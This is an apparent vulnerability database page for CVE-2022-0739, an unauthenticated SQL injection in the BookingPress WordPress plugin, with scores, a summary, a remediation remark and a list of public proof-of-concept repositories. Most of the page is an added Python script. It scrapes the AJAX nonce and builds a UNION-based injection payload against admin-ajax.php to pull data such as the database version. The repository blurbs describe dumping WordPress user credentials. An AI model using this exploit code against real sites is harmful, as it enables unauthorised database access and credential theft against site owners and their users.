CVSSv3: 9.8

CVE-2022-0739

Published: 21/03/2022 Updated: 28/03/2022
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 670
CVSS v2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The BookingPress WordPress plugin prior to 1.0.11 does not sanitise user-supplied POST data before interpolating it into a dynamically constructed SQL query in the bookingpress_front_get_category_services AJAX action. Because the action is registered for unauthenticated visitors (it is reachable through wp-admin/admin-ajax.php without logging in), the result is an unauthenticated SQL injection.
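The advisory describes the bug in one sentence; the Python below, added here and not taken from this page or from any of the PoC repositories listed further down, shows the pieces every such PoC needs: a version check against the plugin's readme.txt, extraction of the AJAX nonce from a page that embeds the booking widget, construction of the admin-ajax.php POST, and recovery of the injected value from the JSON the action returns. It runs entirely offline against constructed sample input. The action name comes from the advisory; the injectable parameter `total_service`, the `)` that closes the original query, the nine-column UNION, the `"_wpnonce":"..."` location in the page and the plugin directory `bookingpress-appointment-booking` are assumptions taken from the public PoCs and WordPress conventions, not from this page, so verify them against your target.

```python
"""Added example for CVE-2022-0739 (not code from any listed repository).

Grounded in the advisory: the AJAX action name and its unauthenticated reach.
ASSUMPTIONS (from published PoCs / WordPress conventions, not from this page):
  * the injectable POST parameter is `total_service`, the surrounding query
    is closed with `)` and its SELECT returns 9 columns;
  * the front-end page embeds the nonce as "_wpnonce":"<10 hex chars>";
  * the plugin lives in wp-content/plugins/bookingpress-appointment-booking.
"""
import re
from urllib.parse import urlencode

AJAX_ACTION = "bookingpress_front_get_category_services"  # from the advisory
FIXED_VERSION = (1, 0, 11)                                # first fixed release
PLUGIN_SLUG = "bookingpress-appointment-booking"          # ASSUMPTION
UNION_COLUMNS = 9                                         # ASSUMPTION
MARK = "~"  # delimiter wrapped around injected output so it is easy to find


def readme_url(base_url: str) -> str:
    """Public readme.txt of the plugin; its 'Stable tag' is the version."""
    return base_url.rstrip("/") + f"/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"


def parse_version(readme_text: str) -> tuple:
    """Return the 'Stable tag:' line of a plugin readme.txt as an int tuple."""
    m = re.search(r"^Stable tag:\s*([\d.]+)", readme_text, re.MULTILINE)
    if not m:
        raise ValueError("no Stable tag in readme")
    return tuple(int(p) for p in m.group(1).split("."))


def version_is_vulnerable(readme_text: str) -> bool:
    """True when the readme reports a version below 1.0.11."""
    v = parse_version(readme_text)
    v = v + (0,) * (3 - len(v))  # pad "1.1" -> (1, 1, 0) so tuples compare sanely
    return v < FIXED_VERSION


def extract_nonce(html: str) -> str:
    """Pull the AJAX nonce out of a page that embeds the booking widget.

    Location of the nonce is an ASSUMPTION; the PoCs on this page take it from
    a page URL (-nu / --event-dir) or as a value (-p), which is what this does.
    """
    m = re.search(r'"_wpnonce"\s*:\s*"([0-9a-f]+)"', html)
    if not m:
        raise ValueError("nonce not found; is the booking widget on this page?")
    return m.group(1)


def build_request(base_url: str, nonce: str, expr: str, category_id: int = 1):
    """Return (url, form_dict) for one UNION-based injection.

    `expr` is the SQL expression whose value should come back, e.g. "user()".
    The first UNION column carries it, wrapped in MARK so it can be located
    in whatever JSON the action echoes.
    """
    first = f"CONCAT('{MARK}',{expr},'{MARK}')"
    cols = [first] + [str(i) for i in range(2, UNION_COLUMNS + 1)]
    payload = "-7502) UNION ALL SELECT " + ",".join(cols) + "-- -"  # ASSUMPTION
    body = {
        "action": AJAX_ACTION,
        "_wpnonce": nonce,
        "category_id": str(category_id),
        "total_service": payload,
    }
    return base_url.rstrip("/") + "/wp-admin/admin-ajax.php", body


def encode_body(body: dict) -> str:
    """application/x-www-form-urlencoded body for the POST."""
    return urlencode(body)


def extract_results(response_text: str) -> list:
    """Every MARK-delimited value in the response (values containing MARK
    themselves would be split; pick a rarer delimiter if that happens)."""
    return re.findall(re.escape(MARK) + r"(.*?)" + re.escape(MARK), response_text)


# Constructed sample data, not captured from any real site.
SAMPLE_README = "=== BookingPress ===\nStable tag: 1.0.10\n"
SAMPLE_PAGE = '<script>var bp = {"_wpnonce":"a1b2c3d4e5"};</script>'
SAMPLE_RESPONSE = '[{"id": "~10.5.15-MariaDB~", "name": "2", "price": "3"}]'

if __name__ == "__main__":
    print("vulnerable version:", version_is_vulnerable(SAMPLE_README))
    nonce = extract_nonce(SAMPLE_PAGE)
    url, body = build_request("http://target.example", nonce, "@@version")
    print(url, encode_body(body))
    print("recovered:", extract_results(SAMPLE_RESPONSE))
```

The standard remediation for this class of bug, and the reason 1.0.11 is the cut-off, is to stop concatenating request values into the query string and pass them through `$wpdb->prepare()` with typed placeholders (`%d` for the numeric ids), so the version check above is the quickest triage step before any request is sent.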

Vulnerable Product

reputeinfosystems bookingpress

GitHub Repositories

CVE-2022-0739 BookingPress [WordPress Plugin] SQL Injection, BookingPress before 1.0.11

Proof-of-Concept exploit (SQLI BookingPress before 1.0.11)

CVE-2022-0739 Proof-of-Concept exploit (SQLi, BookingPress before 1.0.11). DISCLAIMER: Usage of this program without prior mutual consent can be considered an illegal activity. It is the end user's responsibility to obey all applicable local, state and federal laws. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

Bash exploit for CVE-2022-0739, unauthenticated SQL injection in BookingPress < 1.0.11.
Usage: ./exploit.sh [options]
Options:
  -u, --url VALUE        Set the URL (ex: example.com) (required)
  -e, --event-dir VALUE  Set the event directory (ex: events)
  -h, --help             Display this help message

Simple bash script to automate the exploitation of CVE-2022-0739.

CVE-2022-0739 Proof-of-Concept exploit (SQLi, BookingPress before 1.0.11). Usage: supply the URL of the page on which the BookingPress plugin is in use: bash exploit.sh ''. Example (hashes are redacted in this demo): ┌──(user@user)-[~/] └─$ bash sqli_exploit.sh 'localhost/calendar/'

CVE-2022-0739 WordPress BookingPress SQLi

CVE-2022-0739 WordPress BookingPress Plugin < 1.0.11 Unauthenticated SQL Injection. Getting Started: executing the program with python3: python3 sqli.py -u 'wordpresssite' -p 'wpnonce_value'. Help: for the help menu, python3 sqli.py -h. Disclaimer: All the code pr

BookingPress < 1.0.11 - Unauthenticated SQL Injection

CVE-2022-0739 BookingPress < 1.0.11 - Unauthenticated SQL Injection. The plugin fails to properly sanitize user-supplied POST data before it is used in a dynamically constructed SQL query via the bookingpress_front_get_category_services AJAX action (available to unauthenticated users), leading to an unauthenticated SQL injection. CVE-2022-0739 pluginstracwordpres

Exploit for WP BookingPress (< 1.0.11) based on destr4ct's PoC.

CVE-2022-0739: My take on the CVE-2022-0739 BookingPress exploit, based on destr4ct's PoC - just prettier. Example usage against HackTheBox's MetaTwo machine, which hosts a WordPress site with a vulnerable BookingPress plugin (version 1.0.10): python booking-sqlinjector.py -u metapress.htb -nu metapress.htb/events/ -a -o db_dump

🐍 Python Exploit for CVE-2022-0739

CVE-2022-0739 Python PoC Exploit for CVE-2022-0739. Features: Database Metadata Lookup, WordPress User Credential Dump, Arbitrary Blind Query Injection. 💉 Usage: cve-2022-0739 [-h] -u URL [-e EXEC]. Options: -h, --help show this help message and exit; -u URL, --url URL URL of the page containing the BookingPress widget; -e EXEC, --exec EXEC Optional qu